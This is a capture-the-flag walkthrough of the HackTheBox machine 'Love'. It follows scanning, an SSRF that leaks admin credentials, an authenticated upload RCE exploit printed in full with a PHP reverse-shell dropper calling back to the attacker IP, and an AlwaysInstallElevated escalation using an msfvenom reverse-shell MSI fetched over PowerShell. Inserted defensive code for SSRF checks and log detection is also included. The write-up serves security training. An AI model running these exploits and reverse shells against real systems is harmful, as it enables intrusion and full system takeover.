Love is one of the machines currently available on the HackTheBox hacking platform and is rated Easy.
In this case it is a machine running the Windows operating system.
Port scanning
As usual, we add the IP of the Love machine, 10.10.10.239, to /etc/hosts as love.htb and start with the nmap port scan.
```
nmap -p- --min-rate 10000 -oA enumeration/nmap2 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.040s latency).
Not shown: 65397 closed tcp ports (conn-refused), 119 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5000/tcp  open  upnp
5040/tcp  open  unknown
5985/tcp  open  wsman
5986/tcp  open  wsmans
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
```
We run a first scan to find the open ports, and then a more specific one against the ports we are interested in:
```
nmap -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680 -sCV -oA enumeration/nmap3 10.10.10.239
Nmap scan report for 10.10.10.239
Host is up (0.077s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_http-title: 403 Forbidden
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings:
|   NULL:
|_    Host '10.10.14.9' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
5040/tcp open  unknown
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-07-20T18:07:28+00:00; +21m34s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_http-title: Not Found
| tls-alpn:
|_  http/1.1
7680/tcp open  pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=7/20%Time=62D83EA5%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.9'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-07-20T11:07:16-07:00
|_clock-skew: mean: 2h06m34s, deviation: 3h30m01s, median: 21m33s
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-07-20T18:07:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 20 17:45:55 2022 -- 1 IP address (1 host up) scanned in 175.12 seconds
```
We see several interesting things, which we will investigate in more depth in the following sections.
Enumeration
We look at the ports we saw above, starting with port 80.
There we find a login page for which we have no credentials, so we keep looking.
We check whether we can do anything with the SMB port:
```
$ smbclient -N -L //10.10.10.239
session setup failed: NT_STATUS_ACCESS_DENIED
```
But we have no permissions, so we move on and check the MySQL port, 3306:
```
$ mysql -h 10.10.10.239
ERROR 1130 (HY000): Host '10.10.14.9' is not allowed to connect to this MariaDB server
```
Which we cannot access either, so we continue.
Having looked at the web portal, let's check port 443.
We have no permission to access it, but let's look at the certificate the site presents:
Here we discover several things: on the one hand, a domain and a subdomain
```
love.htb
staging.love.htb
```
And an e-mail address
```
roy@love.htb
```
So we add the domains to our /etc/hosts file and browse to staging.love.htb, which looks as shown in the following screenshot.
Looking through the site we find, on the demo link, a page that lets us supply a URL.
We try a few things with it without success, so we try the ports discovered earlier and get a response on port 5000.
Where we also obtain some credentials:
```
Vote Admin Creds admin: @LoveIsInTheAir!!!!
```
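The demo page's fetch-a-URL feature reached the server's own port 5000 because the supplied address was never checked. As an added defender-side example (not code from the box or from the Voting System project), this is the destination validation such a feature should perform before fetching; FAKE_DNS, fake_resolve and the allowed port set are assumptions made so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed name table so the example runs offline. A real deployment would
# resolve with socket.getaddrinfo() and then connect to the resolved address
# itself (never re-resolve the name) so a DNS rebind cannot swap in 127.0.0.1.
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "love.htb": ["10.10.10.239"],
    "staging.love.htb": ["10.10.10.239"],
    "example.com": ["93.184.216.34"],
}

def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}   # a public-URL demo only needs ordinary web ports

def is_internal(ip):
    """True for any address a server-side fetch must never reach."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def check_fetch_target(url, resolve=fake_resolve):
    """Return (allowed, reason) for a user-supplied URL before fetching it."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = [ipaddress.ip_address(host)]      # literal IPv4 or bracketed IPv6
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        if not addrs:
            return False, f"{host} does not resolve"
    for ip in addrs:                               # every A/AAAA answer must pass
        if is_internal(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"
```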
We try them on the login panel we saw earlier, but the credentials are not valid, so let's enumerate directories to see whether we missed anything; in this case we use the feroxbuster tool.
```
$ feroxbuster -u http://love.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

by Ben "epi" Risher 🤓                 ver: 2.7.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://love.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      126l      324w     4388c http://love.htb/
301      GET        9l       30w      330c http://love.htb/images => http://love.htb/images/
301      GET        9l       30w      331c http://love.htb/plugins => http://love.htb/plugins/
301      GET        9l       30w      329c http://love.htb/admin => http://love.htb/admin/
301      GET        9l       30w      332c http://love.htb/includes => http://love.htb/includes/
302      GET        0l        0w        0c http://love.htb/logout.php => index.php
302      GET        0l        0w        0c http://love.htb/login.php => index.php
301      GET        9l       30w      338c http://love.htb/admin/includes => http://love.htb/admin/includes/
302      GET        0l        0w        0c http://love.htb/admin/login.php => index.php
302      GET        0l        0w        0c http://love.htb/home.php => index.php
302      GET        0l        0w        0c http://love.htb/admin/logout.php => index.php
403      GET        9l       30w      298c http://love.htb/webalizer
302      GET      412l     1114w        0c http://love.htb/admin/home.php => index.php
200      GET      126l      324w     4388c http://love.htb/index.php
403      GET        9l       30w      298c http://love.htb/phpmyadmin
302      GET        5l       47w      397c http://love.htb/admin/print.php => index.php
200      GET      170l      450w     6198c http://love.htb/admin/index.php
302      GET        0l        0w        0c http://love.htb/preview.php => index.php
301      GET        9l       30w      328c http://love.htb/dist => http://love.htb/dist/
302      GET      379l     1043w        0c http://love.htb/admin/votes.php => index.php
301      GET        9l       30w      329c http://love.htb/tcpdf => http://love.htb/tcpdf/
403      GET       11l       47w      417c http://love.htb/licenses
403      GET       11l       47w      417c http://love.htb/server-status
302      GET      595l     1513w        0c http://love.htb/admin/candidates.php => index.php
403      GET        9l       30w      298c http://love.htb/con
403      GET        9l       30w      298c http://love.htb/con.php
403      GET        9l       30w      298c http://love.htb/admin/con
403      GET        9l       30w      298c http://love.htb/admin/con.php
403      GET        9l       30w      298c http://love.htb/aux
403      GET        9l       30w      298c http://love.htb/aux.php
403      GET        9l       30w      298c http://love.htb/admin/aux
403      GET        9l       30w      298c http://love.htb/admin/aux.php
302      GET      490l     1277w        0c http://love.htb/admin/positions.php => index.php
302      GET      406l     1038w        0c http://love.htb/admin/ballot.php => index.php
403      GET        9l       30w      298c http://love.htb/error%1F_log
403      GET        9l       30w      298c http://love.htb/error%1F_log.php
403      GET        9l       30w      298c http://love.htb/admin/error%1F_log
403      GET        9l       30w      298c http://love.htb/admin/error%1F_log.php
403      GET        9l       30w      298c http://love.htb/prn
403      GET        9l       30w      298c http://love.htb/prn.php
403      GET        9l       30w      298c http://love.htb/admin/prn
403      GET        9l       30w      298c http://love.htb/admin/prn.php
403      GET       11l       47w      417c http://love.htb/server-info
[####################] - 3m    478512/478512  0s      found:43      errors:341
[####################] - 3m     53168/53168   229/s   http://love.htb
[####################] - 3m     53168/53168   225/s   http://love.htb/
[####################] - 0s     53168/53168   0/s     http://love.htb/images => Directory listing (add -e to scan)
[####################] - 0s     53168/53168   0/s     http://love.htb/plugins => Directory listing (add -e to scan)
[####################] - 3m     53168/53168   227/s   http://love.htb/admin
[####################] - 0s     53168/53168   0/s     http://love.htb/includes => Directory listing (add -e to scan)
[####################] - 0s     53168/53168   0/s     http://love.htb/admin/includes => Directory listing (add -e to scan)
[####################] - 0s     53168/53168   0/s     http://love.htb/dist => Directory listing (add -e to scan)
[####################] - 0s     53168/53168   0/s     http://love.htb/tcpdf => Directory listing (add -e to scan)
```
In the enumeration above we find the /admin URL, which takes us to another login screen; we enter the credentials and reach the portal's dashboard.
Now that we are in, we take a quick look around the portal and search for known vulnerabilities in the "voting system" software, and we find an interesting RCE:
```
$ searchsploit "voting system"
--------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass                                                             | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)                                                  | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated)                                         | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)                    | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting                         | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)                                                         | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)                                | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                                              | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)                                      | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection | php/webapps/50052.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
So we copy the file (49445.py) and edit it with our credentials, leaving it as shown below:
```python
# Exploit Title: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
# Date: 19/01/2021
# Exploit Author: Richard Jones
# Vendor Homepage:https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10 2004 + XAMPP 7.4.4

import requests

# --- Edit your settings here ----
IP = "love.htb" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.9" # Reverse shell IP
REV_PORT = "4444" # Reverse port
# --------------------------------

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

payload = """
<?php
header('Content-type: text/plain');
$ip = "IIPP";
$port = "PPOORRTT";
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>
"""
payload = payload.replace("IIPP", REV_IP)
payload = payload.replace("PPOORRTT", REV_PORT)

s = requests.Session()

def getCookies():
    r = s.get(INDEX_PAGE)
    return r.cookies

def login():
    cookies = getCookies()
    data = {
        "username":USERNAME,
        "password":PASSWORD,
        "login":""
    }
    r = s.post(LOGIN_URL, data=data, cookies=cookies)
    if r.status_code == 200:
        print("Logged in")
        return True
    else:
        return False

def sendPayload():
    if login():
        global payload
        payload = bytes(payload, encoding="UTF-8")
        files = {'photo':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) }
        data = {
            "firstname":"a",
            "lastname":"b",
            "password":"1",
            "add":""
        }
        r = s.post(VOTE_URL, data=data, files=files)
        if r.status_code == 200:
            print("Poc sent successfully")
        else:
            print("Error")

def callShell():
    r = s.get(CALL_SHELL, verify=False)
    if r.status_code == 200:
        print("Shell called check your listiner")

print("Start a NC listner on the port you choose above and run...")
sendPayload()
callShell()
```
Let's try it: we start our listener and run the script
```
$ python3 49445.py
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully
```
And we get access on our listener
```
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from love.htb [10.10.10.239] 61012
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
```
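The exploit above works because the voter form accepts a .php file as the "photo" and the web server then executes it under /images/. As an added example, not from the original post or the Voting System project, this detection logic runs over constructed Apache access-log lines and flags script-extension files requested from the upload directory, noting whether the same client POSTed to the upload endpoint first; the endpoint and directory names are taken from the exploit, the log lines and the extension list are constructed.

```python
import re
from collections import defaultdict

# Apache "combined" format: client - user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Assumed layout of the Voting System install: the voter form posts to
# /admin/voters_add.php and stores the "photo" under /images/.
UPLOAD_ENDPOINTS = {"/admin/voters_add.php"}
UPLOAD_DIRS = ("/images/",)
SCRIPT_EXTS = (".php", ".php3", ".php5", ".php7", ".phtml", ".phar", ".phps")

# Constructed sample log lines (not captured from the box).
SAMPLE_LOG = """
10.10.14.9 - - [20/Jul/2022:11:05:01 -0700] "GET /admin/index.php HTTP/1.1" 200 6198 "-" "python-requests/2.28.1"
10.10.14.9 - - [20/Jul/2022:11:05:02 -0700] "POST /admin/login.php HTTP/1.1" 302 0 "-" "python-requests/2.28.1"
10.10.14.9 - - [20/Jul/2022:11:05:03 -0700] "POST /admin/voters_add.php HTTP/1.1" 200 5123 "-" "python-requests/2.28.1"
10.10.14.9 - - [20/Jul/2022:11:05:04 -0700] "GET /images/shell.php HTTP/1.1" 200 88 "-" "python-requests/2.28.1"
10.10.14.20 - - [20/Jul/2022:11:06:10 -0700] "GET /images/logo.png HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
10.10.14.21 - - [20/Jul/2022:11:07:30 -0700] "GET /images/old.phtml?c=id HTTP/1.1" 404 298 "-" "curl/7.81.0"
""".strip().splitlines()


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_script_hits_in_upload_dirs(lines):
    """Flag requests that execute a script-extension file from an upload directory.

    Each finding records whether the same client POSTed to an upload endpoint
    earlier in the log: the upload-then-trigger pattern used by this exploit.
    """
    uploads_seen = defaultdict(int)    # client ip -> earlier upload POSTs
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]   # drop the query string before matching
        if rec["method"] == "POST" and path in UPLOAD_ENDPOINTS:
            uploads_seen[rec["ip"]] += 1
        elif path.startswith(UPLOAD_DIRS) and path.lower().endswith(SCRIPT_EXTS):
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": path,
                "status": int(rec["status"]),
                "uploaded_first": uploads_seen[rec["ip"]] > 0,
            })
    return findings
```

A 200 on such a request means the server executed the file; a 404 or 403 still deserves a look, since the client was probing for one.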
Getting the user flag
Now that we are in, we go to the user's home folder to get the flag
```
C:\>cd Users\phoebe\Desktop
cd Users\phoebe\Desktop

C:\Users\Phoebe\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users\Phoebe\Desktop

04/13/2021  03:20 AM    <DIR>          .
04/13/2021  03:20 AM    <DIR>          ..
07/20/2022  10:53 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,126,552,064 bytes free

C:\Users\Phoebe\Desktop>type user.txt
type user.txt
5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1

C:\Users\Phoebe\Desktop>
```
Privilege escalation
We have the first part; now we enumerate to escalate privileges to root. In our case we use winPEAS, so we download it to the machine with PowerShell.
First we check the machine's architecture:
```
c:\Users\Phoebe\Documents>systeminfo | findstr "System Type"
systeminfo | findstr "System Type"
OS Build Type:             Multiprocessor Free
System Boot Time:          7/20/2022, 10:52:53 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
System Directory:          C:\WINDOWS\system32
System Locale:             en-us;English (United States)
```
And download the x64 build:
```
c:\Users\Phoebe\Documents>powershell wget http://10.10.14.9:8000/winPEASx64.exe -outfile wp.exe
powershell wget http://10.10.14.9:8000/winPEASx64.exe -outfile wp.exe
```
We run the file and discover several interesting things.
First, the user's PowerShell command history can be read:
```
PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.19041.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 51B
```
We also see that we can write to the root of the drive, that is, C:\
```
Remember that you should search more info inside the other drives
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 3 GB)(Permissions: Authenticated Users [AppendData/CreateDirectories])
```
And most importantly, we see that AlwaysInstallElevated is set to 1 in both HKLM and HKCU, which means any MSI package this user installs runs with SYSTEM privileges:
```
Checking AlwaysInstallElevated
  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!
```
Given this last finding, we will try to escalate privileges by this method.
First we generate a payload with msfvenom:
```
$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4445 -f msi -o love.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: love.msi
```
We upload it to the machine:
```
c:\Users\Phoebe\Documents>powershell wget http://10.10.14.9:5000/love.msi -outfile love.msi
powershell wget http://10.10.14.9:5000/love.msi -outfile love.msi
```
And run it with msiexec:
```
c:\Users\Phoebe\Documents>msiexec /quiet /qn /i love.msi
msiexec /quiet /qn /i love.msi
```
And we automatically get a SYSTEM shell on our listener:
```
$ nc -lvp 4445
listening on [any] 4445 ...
connect to [10.10.14.9] from love.htb [10.10.10.239] 61024
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
```
Getting the root flag
Now that we are SYSTEM, let's get the root flag to complete the machine.
```
C:\WINDOWS\system32>
C:\WINDOWS\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx4
```
And we have our root flag to complete this machine and earn our points. As a final step it would remain to dump the credentials, whether with mimikatz, impacket or whichever tool you prefer.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link